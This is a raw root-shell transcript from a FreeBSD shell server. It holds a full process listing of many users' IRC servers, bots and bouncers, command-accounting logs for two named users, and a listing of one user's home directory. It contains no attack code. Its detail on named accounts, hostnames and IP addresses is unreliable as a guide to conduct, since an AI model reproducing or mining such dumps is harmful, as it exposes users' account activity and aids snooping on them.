root 34 0.0 0.0 0 8 ?? WL 27Jan08 0:00.60 [irq1: atkbd0]
|
||
root 35 0.0 0.0 0 8 ?? WL 27Jan08 0:00.00 [swi0: sio]
|
||
root 36 0.0 0.0 0 8 ?? DL 27Jan08 15:56.90 [pagedaemon]
|
||
root 37 0.0 0.0 0 8 ?? DL 27Jan08 0:01.89 [vmdaemon]
|
||
root 38 0.0 0.0 0 8 ?? DL 27Jan08 98:08.61 [pagezero]
|
||
root 39 0.0 0.0 0 8 ?? DL 27Jan08 3:59.11 [bufdaemon]
|
||
root 40 0.0 0.0 0 8 ?? DL 27Jan08 519:04.35 [syncer]
|
||
root 41 0.0 0.0 0 8 ?? DL 27Jan08 5:03.46 [vnlru]
|
||
root 42 0.0 0.0 0 8 ?? DL 27Jan08 56:44.12 [softdepflush]
|
||
root 43 0.0 0.0 0 8 ?? DL 27Jan08 96:57.63 [schedcpu]
|
||
root 753 0.0 0.0 528 0 ?? IWs - 0:00.00 /sbin/devd
|
||
root 808 0.0 0.0 1376 368 ?? Ss 27Jan08 29:30.11 /usr/sbin/syslogd -s
|
||
root 905 0.0 0.0 1288 108 ?? Ss 27Jan08 0:38.65 /usr/sbin/usbd
|
||
nobody 921 0.0 0.1 2368 644 ?? Ss 27Jan08 10:21.51 proftpd: (accepting connections) (proftpd)
|
||
root 973 0.0 0.0 1444 344 ?? Is 27Jan08 9:25.16 /usr/sbin/cron -s
|
||
nodex 1211 0.0 0.1 4892 620 ?? S 27Jan08 2:16.48 ./services
|
||
nodex 1219 0.0 0.1 3408 796 ?? S 27Jan08 20:22.77 ircd: irc.nodexirc.net (ircd)
|
||
crazyl 1230 0.0 0.2 3484 1896 ?? S 27Jan08 62:45.21 ./eggdrop ApocBot.conf (eggdrop-1.6.18)
|
||
crazyl 1241 0.0 0.2 3952 2400 ?? S 27Jan08 93:52.56 ./eggdrop Hibben.conf (eggdrop-1.6.18)
|
||
crazyl 1248 0.0 0.2 4128 2352 ?? S 27Jan08 96:56.14 ./eggdrop CLBot.conf (eggdrop-1.6.18)
|
||
root 2937 0.0 0.0 1408 204 ?? Is 27Jan08 2:15.57 oidentd
|
||
ioplex 4479 0.0 0.2 5228 1608 ?? Ss 10Jun09 2:15.27 ./psybnc conf
|
||
roodyk 7496 0.0 0.0 4512 496 ?? Ss 26Apr09 0:34.85 ./sbnc
|
||
roodyk 7497 0.0 0.2 7760 2416 ?? S 26Apr09 2:06.67 ./sbnc --rpc-child
|
||
bluewish 8293 0.0 0.1 1580 524 ?? Ss 31Mar09 3:18.90 ./energymech
|
||
skypilot 11073 0.0 0.0 1508 0 ?? IWs - 0:00.00 ./bnc
|
||
ste 12145 0.0 0.2 3936 2368 ?? Ss 15Jun09 6:32.39 /usr/home/ste/bsd mob
|
||
ste 12182 0.0 0.2 4960 2556 ?? Ss 15Jun09 7:31.60 /usr/home/ste/bsd player
|
||
lordy 12679 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12680 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12682 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12683 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12684 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12685 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
|
||
lordy 12686 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
|
||
lordy 12687 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12689 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12690 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12691 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12692 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12695 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12696 0.0 0.0 0 0 ?? Z 13Jun09 0:00.00 <defunct>
|
||
lordy 12697 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
|
||
lordy 12701 0.0 0.0 0 0 ?? Z 13Jun09 0:00.01 <defunct>
|
||
crrj13 15843 0.0 0.3 5508 2696 ?? S 28Apr09 3:57.42 ircd: lambda.bitsjointirc.net (ircd)
|
||
daali 18199 0.0 0.0 2888 0 ?? IWs - 0:00.00 ./bnc bnc.conf
|
||
daali 18620 0.0 0.0 2716 0 ?? IWs - 0:00.00 ./bnc bnc.conf
|
||
scouse 19191 0.0 0.1 2956 1152 ?? S 27Nov08 825:22.21 ircd: irc.toughsociety.com (ircd)
|
||
scouse 19383 0.0 0.1 7296 676 ?? S 27Nov08 0:46.99 ./services -logchan
|
||
root 21928 0.0 0.2 5476 2020 ?? Is 9:10PM 0:00.07 sshd: (sshd)
|
||
root 22109 0.0 0.2 5344 2024 ?? Ss 9:15PM 0:00.09 sshd: (sshd)
|
||
blotch 22806 0.0 1.2 18352 12200 ?? Ss 10Dec08 4616:08.79 /usr/home/blotch/inspircd/bin/inspircd
|
||
shoes 25037 0.0 0.2 5092 2132 ?? S 23Sep08 156:12.96 ./eggdrop ./bot.conf (eggdrop-1.6.19)
|
||
shoes 25039 0.0 0.2 5152 2160 ?? S 23Sep08 153:40.81 ./eggdrop ./bot.conf (eggdrop-1.6.19)
|
||
crazyl 25232 0.0 0.3 4344 2676 ?? S 31Jan09 28:34.31 ./eggdrop cx4storm.conf (eggdrop-1.6.18)
|
||
narcissu 26686 0.0 0.1 4740 1452 ?? S 11Mar08 22:41.05 ircd: beta.pseud0.net (ircd)
|
||
smash 26960 0.0 0.2 12128 2032 ?? Ss 9Nov08 147:51.60 /usr/home/smash/wraith/wraith iridium
|
||
blake96 27902 0.0 0.2 3344 1924 ?? S 8Nov08 23:08.58 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
|
||
lyhne1 29482 0.0 0.1 1448 700 ?? S 2Jan09 134:02.80 ./bopm
|
||
chrirc 33440 0.0 0.1 3520 776 ?? S 12Jun08 15:34.94 ircd: irc.ChristianIRC.net (ircd)
|
||
yaquis 43784 0.0 0.1 1520 736 ?? Ss 12Jun09 0:02.72 ./bnc
|
||
devil 43953 0.0 0.1 1592 620 ?? Ss 6Jul08 75:48.71 ./energymech
|
||
smash 44333 0.0 0.2 3936 1920 ?? Ss 5May09 22:54.47 /usr/home/smash/wraith/wraith fpck
|
||
ltootle 48390 0.0 0.2 7040 2456 ?? S 26Jun08 935:23.47 ircd: RedWolf.Wolfpac.Org (ircd)
|
||
root 51233 0.0 0.2 2268 1784 ?? Ss 11:50PM 0:07.93 screen
|
||
lordy 51655 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51656 0.0 0.0 0 0 ?? Z 8Jun09 0:00.01 <defunct>
|
||
lordy 51657 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51658 0.0 0.0 0 0 ?? Z 8Jun09 0:00.01 <defunct>
|
||
lordy 51659 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51660 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51661 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51662 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51663 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51664 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51665 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51668 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
lordy 51669 0.0 0.0 0 0 ?? Z 8Jun09 0:00.00 <defunct>
|
||
y2j 53333 0.0 0.2 3296 1680 ?? S 22May09 4:05.27 ./psybnc
|
||
y2j 53335 0.0 0.3 4796 2992 ?? S 22May09 6:11.27 ./eggdrop IcEMaN.conf (eggdrop-1.6.17)
|
||
y2j 53336 0.0 0.4 6032 3608 ?? S 22May09 7:22.14 ./eggdrop SioN.conf (eggdrop-1.6.17)
|
||
ltootle 54810 0.0 0.1 8336 992 ?? S 26Jun08 24:35.00 ./services
|
||
bruhaha 59704 0.0 0.0 1528 0 ?? IWs - 0:00.00 ./bnc
|
||
root 60582 0.0 0.2 5400 2036 ?? Is 3:32AM 0:00.60 sshd: romeo [priv] (sshd)
|
||
romeo 60584 0.0 0.2 5384 2088 ?? S 3:32AM 0:09.86 sshd: (sshd)
|
||
root 63283 0.0 0.2 2332 1828 ?? Is Wed10PM 0:01.12 screen
|
||
root 64492 0.0 0.1 2772 604 ?? Is 17Jun09 4:12.85 /usr/sbin/sshd
|
||
bruhaha 67858 0.0 0.1 1544 616 ?? Ss 23Aug08 17:43.63 ./bnc
|
||
bruhaha 70843 0.0 0.0 1516 0 ?? IWs - 0:00.00 ./bnc
|
||
dealer 78536 0.0 0.1 8176 1316 ?? S 14Mar09 220:01.22 php dealbot.php
|
||
own3d 82309 0.0 0.1 2820 728 ?? Is 15Oct08 3:35.17 ./sbnc
|
||
lymelyte 88242 0.0 0.2 7720 2084 ?? Ss 29Mar09 4:33.70 ./epona
|
||
poolboy 89012 0.0 0.4 5752 3984 ?? S 8Feb09 320:59.08 ./eggdrop CAP0.conf (eggdrop-1.6.17)
|
||
redrum 91676 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
|
||
redrum 91678 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
|
||
redrum 91682 0.0 0.0 1280 0 ?? IW - 0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
|
||
root 92538 0.0 0.0 0 8 ?? DL Thu08AM 0:00.08 [accounting]
|
||
root 93821 0.0 0.1 1436 844 ?? Is Thu08AM 0:00.00 inetd
|
||
root 98040 0.0 0.2 5368 2016 ?? Is 4:35PM 0:00.04 sshd: ioplex [priv] (sshd)
|
||
ioplex 98044 0.0 0.4 7364 4052 ?? I 4:35PM 0:02.03 sshd: ioplex (sshd)
|
||
crazie 98542 0.0 0.4 9732 3884 ?? S 19May09 36:58.07 ./l
|
||
crazie 98871 0.0 0.3 9236 3152 ?? S 19May09 13:26.08 ./mb2
|
||
crazie 99303 0.0 0.2 7512 2324 ?? S 19May09 7:43.22 ./mb6
|
||
root 1033 0.0 0.0 1344 0 v0 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv0
|
||
root 1034 0.0 0.0 1344 0 v1 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv1
|
||
root 1035 0.0 0.0 1344 0 v2 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv2
|
||
root 1036 0.0 0.0 1344 0 v3 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv3
|
||
root 1037 0.0 0.0 1344 0 v4 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv4
|
||
root 1038 0.0 0.0 1344 0 v5 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv5
|
||
root 1039 0.0 0.0 1344 0 v6 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv6
|
||
root 1040 0.0 0.0 1344 0 v7 IWs+ - 0:00.00 /usr/libexec/getty Pc ttyv7
|
||
darien9 2420 0.0 0.1 114060 1208 p0- S 16Mar08 799:19.15 ./psybnc
|
||
manboo 9260 0.0 0.1 3676 924 p0- S 22Apr08 20:51.79 ircd: irc.thederka.com (ircd)
|
||
manboo 11135 0.0 0.1 4288 620 p0- S 22Apr08 4:36.07 ./services
|
||
ac1115 21918 0.0 0.1 21512 1200 p0- S 2Jul08 15:39.60 ./psybnc
|
||
devil 22201 0.0 0.2 21412 1712 p0- S 2Nov08 46:45.70 ./psybnc
|
||
bpunux 27500 0.0 0.1 9476 1136 p0- S 31Oct08 9:22.64 ./psybnc
|
||
bpunux 28911 0.0 0.1 3068 976 p0- S 31Oct08 6:58.93 ./psybnc
|
||
tarawa 33111 0.0 0.3 29660 2640 p0- S 14Mar08 106:21.81 ./psybnc
|
||
reznik 33517 0.0 0.1 40788 1268 p0- S 27Apr08 44:00.81 ./psybnc
|
||
genosyde 34316 0.0 0.1 3192 1464 p0- S 5Jun08 39:10.11 ./eggdrop -m (eggdrop-1.6.18)
|
||
chrirc 40199 0.0 0.1 4248 628 p0- S 12Jun08 3:50.57 ./services
|
||
vamp 44090 0.0 0.2 3936 2464 p0- S 27Jan08 103:08.26 ./eggdrop guanoapes.conf (eggdrop-1.6.15)
|
||
vamp 44142 0.0 0.2 8352 2400 p0- S 27Jan08 102:58.38 ./eggdrop phante.conf (eggdrop-1.6.15)
|
||
vamp 44170 0.0 0.2 3720 2120 p0- S 27Jan08 93:42.97 ./eggdrop bengal.conf (eggdrop-1.6.15)
|
||
darien9 46897 0.0 0.1 84316 1384 p0- S 1Apr08 1518:35.73 ./psybnc
|
||
romeo 51236 0.0 0.2 3268 1836 p0 Is 11:50PM 0:00.03 /usr/local/bin/bash
|
||
romeo 51241 0.0 0.7 9932 6740 p0 S+ 11:50PM 0:34.89 irssi -h absolute.ownage.net
|
||
burnt 59824 0.0 0.3 5952 3156 p0- S 27Jan08 54:17.27 ircd: wasted.ufc-pride.org (ircd)
|
||
burnt 59989 0.0 0.1 9012 1108 p0- S 27Jan08 5:52.73 ./services
|
||
sharpie 63388 0.0 0.2 3908 2172 p0- S 27Jan08 61:39.10 ./eggdrop egg (eggdrop-1.6.15)
|
||
daali 79885 0.0 0.3 5032 2656 p0- S 28Jan08 55:47.60 ./eggdrop (eggdrop-1.6.18)
|
||
darkevil 84286 0.0 0.1 3868 704 p0- S 25Mar08 17:04.32 ircd: irc.darkquest.org (ircd)
|
||
sharpie 95504 0.0 0.2 3812 2140 p0- S 25Apr08 53:07.90 ./eggdrop sun (eggdrop-1.6.15)
|
||
sharpie 95593 0.0 0.2 3708 2148 p0- S 25Apr08 51:59.24 ./eggdrop spank (eggdrop-1.6.15)
|
||
root 22120 0.0 0.2 3220 1888 p1 Ss 9:16PM 0:00.03 -bash (bash)
|
||
root 22827 0.0 0.1 1648 980 p1 R+ 9:32PM 0:00.00 ps -auxwww
|
||
dark 3869 0.0 0.2 31228 2488 p2- S 22Apr09 11:35.44 ./psybnc
|
||
romeo 4433 0.0 0.1 2040 1448 p2 S+ 7:09PM 0:00.04 screen -r
|
||
mooo 10652 0.0 0.2 41984 2284 p2- S 21May09 11:44.09 ./psybnc
|
||
tlm 11616 0.0 0.2 27520 1788 p2- S 26Apr09 4:20.44 ./psybnc
|
||
vamp 18167 0.0 0.1 29116 1320 p2- S 5Apr08 23:34.92 ./psybnc
|
||
wchan21 29220 0.0 0.2 10628 2024 p2- S 30Apr09 7:46.46 ./psybnc psybnc.conf
|
||
mimik0r 29613 0.0 0.2 5176 2248 p2- S 30May09 3:56.60 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
|
||
psycoz 29853 0.0 0.1 3248 1404 p2- S 7Jun09 1:13.18 ./psybnc
|
||
zeepysea 33510 0.0 0.1 1424 620 p2- S 20Mar08 291:26.11 ./bopm
|
||
lordy 33773 0.0 0.1 6120 1468 p2- S 30May09 440:58.20 ./bot
|
||
lordy 33777 0.0 0.1 3848 944 p2- S 30May09 360:11.97 ./bot
|
||
lordy 33783 0.0 0.2 7468 1684 p2- S 30May09 444:16.39 ./bot
|
||
lordy 33807 0.0 0.1 4696 1024 p2- S 30May09 439:42.64 ./bot
|
||
lordy 33811 0.0 0.1 5784 1088 p2- S 30May09 443:07.55 ./bot
|
||
narcissu 34556 0.0 0.1 136368 564 p2- S 20Feb08 38:20.52 ./psybnc
|
||
cmm 37284 0.0 0.2 22500 1724 p2- S 13Apr09 6:35.61 ./psybncD
|
||
devil 43929 0.0 0.2 15176 2316 p2- S 22May09 8:40.13 sshd
|
||
yaquis 47275 0.0 0.2 2976 1680 p2- S 6Jun09 1:51.67 ./eggdrop -m simple.conf (eggdrop-1.6.15)
|
||
chaos1 48442 0.0 0.3 3400 2812 p2- S 10:44PM 0:07.40 ircd: irc.sonicanime.net (ircd)
|
||
chaos1 48822 0.0 0.7 8296 7116 p2- S 10:52PM 0:01.09 /home/chaos1/core/anope/host/services
|
||
chaos1 49843 0.0 0.6 7060 6444 p2- S 11:19PM 1:36.17 /home/chaos1/core/eggdrop/eggdrop ./run.eggdrop (eggdrop-1.6.19)
|
||
tarawa 51960 0.0 3.6 82452 36732 p2- S 17May09 10:36.81 ./eggdrop Asurada.conf (eggdrop-1.6.19)
|
||
yaquis 52945 0.0 0.1 1432 960 p2- S 12:31AM 0:48.93 ./bopm
|
||
mlh 54757 0.0 0.2 3620 2108 p2- S 8Apr09 8:18.74 ./eggdrop a.conf (eggdrop-1.6.19)
|
||
safety 59083 0.0 0.2 3316 1752 p2- S 22May09 1:49.86 ./psybnc
|
||
brosco 59827 0.0 0.2 3912 2532 p2- S 1Jun09 3:41.68 ./eggdrop iphoney.conf (eggdrop-1.6.19)
|
||
romeo 60586 0.0 0.2 3244 1900 p2 Is 3:32AM 0:00.05 -bash (bash)
|
||
cpu 60695 0.0 0.2 12308 1880 p2- S 22May09 2:16.63 ./gramicci
|
||
bollox 61265 0.0 0.2 3556 2068 p2- S 1May09 5:46.65 ./eggdrop Prolapse.conf (eggdrop-1.6.18)
|
||
dealer 74736 0.0 0.2 3180 1636 p2- S 8Apr09 6:58.53 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
|
||
ircjaymz 75110 0.0 0.1 10012 1220 p2- S 18Mar08 24:56.65 ircd: ircdt.com (ircd)
|
||
redrum 80211 0.0 0.6 9244 6144 p2- S 9Jun09 9:12.34 ./eggdrop (eggdrop-1.6.19)
|
||
redrum 80260 0.0 0.6 6868 5764 p2- S 9Jun09 2:38.87 ./eggdrop ald.conf (eggdrop-1.6.19)
|
||
bollox 80752 0.0 0.2 3812 2152 p2- S 7Apr09 8:30.62 ./eggdrop Cerebrum.conf (eggdrop-1.6.18)
|
||
cazz1961 81636 0.0 0.2 3236 1784 p2- S 8May09 11:18.66 ./eggdrop voicer.conf (eggdrop-1.6.19)
|
||
poolboy 85768 0.0 2.3 38696 23352 p2- S 13Jun09 344:08.61 ./eggdrop PlaTaNo.conf (eggdrop-1.6.17)
|
||
qfx 85944 0.0 0.2 3592 2016 p2- S 10Jun09 0:53.81 ./psybnc
|
||
tarawa 88344 0.0 3.0 31980 30444 p2- S 26May09 5:41.99 ./eggdrop Rasetsu.conf (eggdrop-1.6.19)
|
||
bollox 90551 0.0 0.3 4188 2616 p2- S 10Jun09 4:03.14 ./psybnc
|
||
darien9 363 0.0 0.1 126420 1276 p3- S 6Mar08 967:34.73 ./psybnc
|
||
sysc 3001 0.0 0.1 53544 1492 p3- S 27Jan08 28:52.73 ./psybnc
|
||
sqd 15833 0.0 0.1 19444 1436 p3- S 4Aug08 27:53.54 ./psybnc
|
||
crazyl 37528 0.0 0.1 20120 1464 p3- S 27Nov08 8:58.67 ./psybnc
|
||
en0prcv 58418 0.0 0.1 67988 1228 p3- S 4Apr08 97:19.44 ./psybnc
|
||
skypilot 65653 0.0 0.0 7460 388 p3- S 19Nov08 2:43.71 /home/skypilot/NeoStats3.0//bin/neostats
|
||
chevym4n 6472 0.0 0.1 5156 772 p4- S 27Jan08 17:56.69 ircd: pdev.SummitIRC.com (ircd)
|
||
cpu 10289 0.0 0.2 27016 2152 p4- S 14Apr09 5:33.20 ./subdue
|
||
cpu 10303 0.0 0.2 24588 1896 p4- S 14Apr09 4:56.34 ./arc
|
||
oby1 18390 0.0 0.1 103980 1392 p4- S 8Oct08 37:31.06 ./psybnc
|
||
skypilot 43173 0.0 0.1 5612 968 p4- S 3Nov08 10:41.95 ircd: Stinger.SkyzNet.Net (ircd)
|
||
cmm 60721 0.0 0.3 100744 3488 p4- S 10Apr09 50:30.96 ./psybncC
|
||
cmm 60933 0.0 0.3 31732 2888 p4- S 10Apr09 26:32.93 ./psybncB
|
||
cmm 61190 0.0 0.2 26200 2420 p4- S 10Apr09 14:16.41 ./psybncR
|
||
pimpinjg 63286 0.0 0.2 3268 1776 p4 Is Wed10PM 0:00.03 /usr/local/bin/bash
|
||
pimpinjg 63289 0.0 0.9 12636 9372 p4 S+ Wed10PM 1:16.45 irssi -h 72.20.28.217
|
||
darien9 74450 0.0 0.2 38220 2084 p4- S 31Oct08 107:35.62 ./psybnc
|
||
digitalman 97383 0.0 0.2 12644 2436 p4- S 20May09 6:43.68 ./psybnc psybnc.conf
|
||
chevym4n 11847 0.0 0.1 5892 756 p6- S 25Oct08 13:16.82 ircd: irc.SummitIRC.com (ircd)
|
||
crrj13 60894 0.0 0.4 14816 4384 p6- S 6May09 1:41.02 /home/crrj13/NeoStats3.0//bin/neostats
|
||
lynx 71244 0.0 0.1 15292 1164 p6- S 27Aug08 13:54.41 ./psybnc
|
||
yaquis 81249 0.0 0.2 2952 1664 p6- S 5Jun09 2:01.94 ./eggdrop -m simple.conf (eggdrop-1.6.15)
|
||
yaquis 81862 0.0 5.6 58788 57552 p6- S 13Jun09 119:13.68 ircd: coke.accesox.net (ircd)
|
||
darien9 95226 0.0 0.1 7876 1096 p6- S 23Jul08 20:45.03 ./psybnc
|
||
baxxta 95367 0.0 0.1 8020 1144 p6- S 22Jul08 13:11.93 ./psybnc
|
||
yaquis 98909 0.0 0.1 3140 1312 p6- S 30May09 1:26.70 ./psybnc
|
||
nardi 18637 0.0 0.1 1480 680 p7- S 10Mar09 33:41.69 ./bopm
|
||
crash 29763 0.0 0.3 32276 3504 p7- S 30Jan09 164:54.34 ./psybnc1
|
||
mlh 52784 0.0 0.3 4584 3340 p7- S 10Jan09 22:48.64 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
|
||
nyakz 54517 0.0 0.2 30984 2448 p7- S 13Mar09 52:56.09 ./psybnc
|
||
nardi 76675 0.0 0.1 5024 912 p7- S 8Feb09 7:16.69 ircd: Java.Albworld.Net (ircd)
|
||
sqd 77187 0.0 0.2 3352 1584 p7- S 21Jan09 13:05.79 ./eggdrop simple.conf (eggdrop-1.6.19)
|
||
darkuno3 77376 0.0 0.1 3400 792 p7- S 10Mar09 4:06.45 ircd: 72.20.28.219 (ircd)
|
||
lyhne1 88130 0.0 0.4 10540 3712 p7- S 22Dec08 69:14.36 ircd: BlackLotus.Sin-Clan.org (ircd)
|
||
lymelyte 88229 0.0 0.3 3880 3016 p7- S 29Mar09 7:28.37 ircd: irc.ftaresource.com (ircd)
|
||
chozen1 89082 0.0 0.1 3192 1032 p7- S 1Mar09 5:32.87 ./psybnc
|
||
kokoryu 93127 0.0 0.3 4060 2852 p7- S 6Feb09 32:11.57 ./eggdrop (eggdrop-1.6.19)
|
||
hts 96224 0.0 0.6 39004 6252 p7- S 2Mar09 51:21.25 ircd: vital.irc.hackthissite.org (ircd)
|
||
visage 96264 0.0 0.2 3192 1692 p7- S 13Mar09 9:27.48 ./eggdrop -m (eggdrop-1.6.19)
|
||
mrts 24165 0.0 0.2 3176 1612 p8- S 28Mar09 7:48.33 ./eggdrop euro.conf (eggdrop-1.6.19)
|
||
jax66 57226 0.0 0.1 1516 652 p8- S 11May09 24:51.69 ./bopm
|
||
brosco 58343 0.0 0.2 15992 1800 p8- S 29Mar09 8:13.84 ./psybnc
|
||
dv327 76866 0.0 0.1 27624 1208 p8- S 9Aug08 15:14.39 ./psybnc
|
||
subkult 88094 0.0 0.1 72724 1280 p8- S 15Jan09 80:54.12 ./psybnc
|
||
bluewish 97486 0.0 0.2 3552 1852 p8- S 29Mar09 8:28.42 ./eggdrop (eggdrop-1.6.19)
|
||
brosco 31552 0.0 0.3 3792 2592 p9- S 16Mar09 14:24.16 ./eggdrop cancer.conf (eggdrop-1.6.19)
|
||
mrts 32626 0.0 0.2 3176 1620 p9- S 20Mar09 8:36.07 ./eggdrop sins.conf (eggdrop-1.6.19)
|
||
poolboy 44789 0.0 0.2 3448 1956 p9- S 9Feb09 15:20.31 ./eggdrop DaB0SS.conf (eggdrop-1.6.17)
|
||
poolboy 44901 0.0 0.2 3312 1896 p9- S 9Feb09 15:07.57 ./eggdrop Little-JR.conf (eggdrop-1.6.17)
|
||
bollox 60129 0.0 0.3 5308 3376 p9- S 4Jun09 2:40.74 ./eggdrop cutenurse.conf (eggdrop-1.6.18)
|
||
bollox 60150 0.0 0.3 5164 3280 p9- S 4Jun09 2:23.03 ./eggdrop slutnurse.conf (eggdrop-1.6.18)
|
||
brosco 76877 0.0 0.2 3760 2348 p9- S 19Mar09 13:04.80 ./eggdrop-1.6.19 -m plague.conf
|
||
crash 99452 0.0 0.2 37052 2128 p9- S 19Mar09 12:20.42 ./psybnc-oth
|
||
paleride 265 0.0 0.2 3648 2092 pb- S 27Jan09 19:36.88 ircd: irc.leechnet.net (ircd)
|
||
paleride 908 0.0 0.1 4276 788 pb- S 27Jan09 1:40.52 ./services -nofork
|
||
grumpy 79140 0.0 0.3 5576 2692 pb- S 4Feb09 16:37.28 ircd: irc.sidnaceous.com (ircd)
|
||
grumpy 82947 0.0 0.1 7572 1140 pb- I 4Feb09 1:28.12 ./services start
|
||
nardi 17529 0.0 0.1 25992 1028 pc- S 24Mar09 23:43.99 ircd: ChatAlb.Albania.Rr.Nu (ircd)
|
||
cazz1961 17100 0.0 0.6 8824 6268 pd- S Sun06AM 87:41.30 ircd: Smirnoff.1andallirc.net (ircd)
|
||
omgwtf 29455 0.0 0.2 3408 1996 pd- S Sat04AM 0:48.34 ./eggdrop uno.conf (eggdrop-1.6.19)
|
||
omgwtf 29570 0.0 0.2 3572 2228 pd- S Sat04AM 0:48.16 ./eggdrop ambition.conf (eggdrop-1.6.19)
|
||
zeepysea 37950 0.0 0.2 3684 1952 pd- S 17Mar09 10:42.06 ircd: irc.eoegameservers.com (ircd)
|
||
zeepysea 38077 0.0 0.1 8204 1092 pd- S 17Mar09 1:07.05 ./services start
|
||
genosyde 63662 0.0 0.2 17308 2432 pd- S 27Jan09 21:57.28 ./psybnc
|
||
matt 83686 0.0 0.1 3140 1184 pd- S Sat05PM 0:17.40 ./psybnc psybnc.conf
|
||
mrts 84263 0.0 0.2 3172 1636 pd- S 20Mar09 8:46.15 ./eggdrop hez.conf (eggdrop-1.6.19)
|
||
yaquis 94000 0.0 0.5 58432 5312 pd- S Fri10PM 4:51.24 ircd: irc2.accesox.net (ircd)
|
||
cont 49538 0.0 0.2 19684 1784 pe- S 11Jan09 12:46.04 ./psybnc
|
||
chaos1 56819 0.0 0.8 11604 8064 pf- I 18Jun09 0:40.97 /usr/bin/perl ./idlebot.pl (perl5.8.8)
|
||
[root@velocity:/var/run]#
|
||
|
||
[root@velocity:~]# lastcomm -u romeo
|
||
sh - romeo __ 0.00 us
|
||
ls - romeo __ 0.00 us
|
||
screen -F romeo __ 0.00 us
|
||
screen -F romeo __ 0.00 us
|
||
w - romeo ttyp1 0.00 us
|
||
sh - romeo ttyp1 0.00 us
|
||
sshd -F romeo __ 0.59 us
|
||
bash - romeo ttyp1 0.00 us
|
||
ls - romeo ttyp1 0.00 us
|
||
w - romeo ttyp1 0.00 us
|
||
screen - romeo ttyp1 0.00 us
|
||
screen -F romeo __ 0.00 us
|
||
screen -F romeo __ 0.00 us
|
||
screen -F romeo __ 0.00 us
|
||
w - romeo ttyp1 0.00 us
|
||
sh - romeo ttyp1 0.00 us
|
||
|
||
[root@velocity:~]# lastcomm -u pimpinjg
|
||
sshd -F pimpinjg __ 0.00 us
|
||
bash - pimpinjg ttyp2 0.00 us
|
||
screen - pimpinjg ttyp2 0.00 us
|
||
screen -F pimpinjg __ 0.00 us
|
||
screen -F pimpinjg __ 0.00 us
|
||
screen -F pimpinjg __ 0.00 us
|
||
fortune - pimpinjg ttyp2 0.00 us
|
||
sshd -F pimpinjg __ 0.00 us
|
||
sftp-server - pimpinjg __ 0.02 us
|
||
sshd -F pimpinjg __ 0.03 us
|
||
bash - pimpinjg ttyp2 0.00 us
|
||
tput - pimpinjg ttyp2 0.00 us
|
||
screen - pimpinjg ttyp2 0.00 us
|
||
screen -F pimpinjg __ 0.00 us
|
||
screen -F pimpinjg __ 0.00 us
|
||
screen -F pimpinjg __ 0.00 us
|
||
fortune - pimpinjg ttyp2 0.00 us
|
||
|
||
|
||
[root@velocity:/home/romeo]# ls -la
|
||
total 80
|
||
drwxr-xr-x 4 romeo romeo 512 Jun 27 21:56 ./
|
||
drwx--x--x 204 root wheel 3584 Jun 17 18:30 ../
|
||
-rw------- 1 romeo romeo 5 Jun 17 18:35 .bash_history
|
||
-rw-r--r-- 1 romeo romeo 44 Jun 13 08:05 .bash_profile
|
||
-rw-r--r-- 1 romeo romeo 2469 Jun 13 08:00 .bashprompt
|
||
-rw-r--r-- 1 romeo romeo 258 Jun 13 08:03 .bashrc
|
||
-rw-r--r-- 1 romeo romeo 767 Jun 13 07:56 .cshrc
|
||
-rw-r--r-- 1 romeo romeo 23 Jun 17 18:39 .forward
|
||
drwx------ 4 romeo romeo 512 Jun 17 09:42 irclogs/
|
||
drwx------ 3 romeo romeo 512 Jun 17 09:42 .irssi/
|
||
-rw------- 1 romeo romeo 35 Jun 26 17:58 .lesshst
|
||
-rw-r--r-- 1 romeo romeo 248 Jun 13 07:56 .login
|
||
-rw-r--r-- 1 romeo romeo 158 Jun 13 07:56 .login_conf
|
||
-rw------- 1 romeo romeo 373 Jun 13 07:56 .mail_aliases
|
||
